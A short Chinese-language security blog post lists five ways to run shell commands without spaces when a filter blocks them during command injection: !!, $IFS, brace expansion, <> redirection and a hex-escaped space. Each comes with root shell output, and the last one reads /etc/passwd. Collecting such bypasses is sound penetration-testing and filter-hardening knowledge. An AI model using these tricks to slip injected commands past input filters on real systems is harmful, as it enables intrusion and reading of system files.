在搞安全的时候经常会遇到代码/命令执行,不能用空格的情况,总结了几种的绕过方法。
1.!!
1 [root@iZ28wg1kditZ tmp]# pwd 2 /tmp 3 [root@iZ28wg1kditZ tmp]# !! 4 pwd 5 /tmp 6 [root@iZ28wg1kditZ tmp]#
2.$IFS
1 [root@iZ28wg1kditZ tmp]# ls$IFS-al 2 total 40 3 drwxrwxrwt. 8 root root 4096 Nov 17 04:18 . 4 dr-xr-xr-x. 27 root root 4096 Nov 14 16:27 .. 5 srwxrwxrwx 1 root root 0 Oct 12 14:37 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> 6 -rw-r--r-- 1 root root 460 Nov 14 16:27 cron.rule 7 drwxrwxrwx 2 502 test2 4096 Nov 8 11:01 disktables 8 -rw-rw-r-- 1 501 filetest 0 Nov 8 10:58 file 9 drwxrwxrwt 2 root root 4096 May 18 2016 .ICE-unix 10 drwxr-xr-x 2 root root 4096 Nov 14 16:27 install_agent 11 srwxrwxrwx 1 root root 0 Sep 22 14:45 mongodb-27017.sock 12 srwxrwxrwx 1 root root 0 Oct 12 14:37 qtsingleapp-aegisG-46d2 13 srwxr-x--- 1 root root 0 May 18 2016 qtsingleapp-aegisG-46d2-0 14 srwxrwxrwx 1 root root 0 May 18 2016 qtsingleapp-aegiss-a5d2 15 srwxrwxrwx 1 root root 0 May 18 2016 qtsingleapp-aegiss-a5d2-0 16 drwxrw-r-- 2 root root 4096 Nov 16 15:57 rd4Xy6JfY9 17 drwxr-xr-x 2 root root 4096 Nov 10 09:56 test 18 -rw-r--r-- 1 root root 477 Nov 14 16:30 tt_install_shell.log 19 drwxrw-r-- 2 root root 4096 Nov 14 16:52 XUgJsg1WK6 20 [root@iZ28wg1kditZ tmp]#
3.{}
1 [root@iZ28wg1kditZ tmp]# {ls,-al} 2 total 40 3 drwxrwxrwt. 8 root root 4096 Nov 17 04:18 . 4 dr-xr-xr-x. 27 root root 4096 Nov 14 16:27 .. 5 srwxrwxrwx 1 root root 0 Oct 12 14:37 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> 6 -rw-r--r-- 1 root root 460 Nov 14 16:27 cron.rule 7 drwxrwxrwx 2 502 test2 4096 Nov 8 11:01 disktables 8 -rw-rw-r-- 1 501 filetest 0 Nov 8 10:58 file 9 drwxrwxrwt 2 root root 4096 May 18 2016 .ICE-unix 10 drwxr-xr-x 2 root root 4096 Nov 14 16:27 install_agent 11 srwxrwxrwx 1 root root 0 Sep 22 14:45 mongodb-27017.sock 12 srwxrwxrwx 1 root root 0 Oct 12 14:37 qtsingleapp-aegisG-46d2 13 srwxr-x--- 1 root root 0 May 18 2016 qtsingleapp-aegisG-46d2-0 14 srwxrwxrwx 1 root root 0 May 18 2016 qtsingleapp-aegiss-a5d2 15 srwxrwxrwx 1 root root 0 May 18 2016 qtsingleapp-aegiss-a5d2-0 16 drwxrw-r-- 2 root root 4096 Nov 16 15:57 rd4Xy6JfY9 17 drwxr-xr-x 2 root root 4096 Nov 10 09:56 test 18 -rw-r--r-- 1 root root 477 Nov 14 16:30 tt_install_shell.log 19 drwxrw-r-- 2 root root 4096 Nov 14 16:52 XUgJsg1WK6 20 [root@iZ28wg1kditZ tmp]#
4.<>
1 [root@iZ28wg1kditZ tmp]# vim test 2 [root@iZ28wg1kditZ tmp]# ls 3 Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> disktables mongodb-27017.sock qtsingleapp-aegisG-46d2-0 qtsingleapp-aegiss-a5d2-0 test XUgJsg1WK6 4 cron.rule install_agent qtsingleapp-aegisG-46d2 qtsingleapp-aegiss-a5d2 rd4Xy6JfY9 tt_install_shell.log 5 [root@iZ28wg1kditZ tmp]# cat<>test 6 hello 7 [root@iZ28wg1kditZ tmp]# cat test 8 hello 9 [root@iZ28wg1kditZ tmp]#
5.x20
1 [root@iZ28wg1kditZ ~]# CMD=$'x20/etc/passwd'&&cat$CMD 2 root:x:0:0:root:/root:/bin/bash 3 bin:x:1:1:bin:/bin:/sbin/nologin 4 daemon:x:2:2:daemon:/sbin:/sbin/nologin 5 adm:x:3:4:adm:/var/adm:/sbin/nologin 6 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin 7 sync:x:5:0:sync:/sbin:/bin/sync 8 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 9 halt:x:7:0:halt:/sbin:/sbin/halt 10 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 11 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin 12 operator:x:11:0:operator:/root:/sbin/nologin 13 games:x:12:100:games:/usr/games:/sbin/nologin 14 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin 15 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 16 nobody:x:99:99:Nobody:/:/sbin/nologin 17 dbus:x:81:81:System message bus:/:/sbin/nologin 18 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin 19 abrt:x:173:173::/etc/abrt:/sbin/nologin 20 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 21 ntp:x:38:38::/etc/ntp:/sbin/nologin 22 saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin 23 postfix:x:89:89::/var/spool/postfix:/sbin/nologin 24 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin 25 tcpdump:x:72:72::/:/sbin/nologin 26 nscd:x:28:28:NSCD Daemon:/:/sbin/nologin 27 apache:x:48:48:Apache:/var/www:/sbin/nologin 28 mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false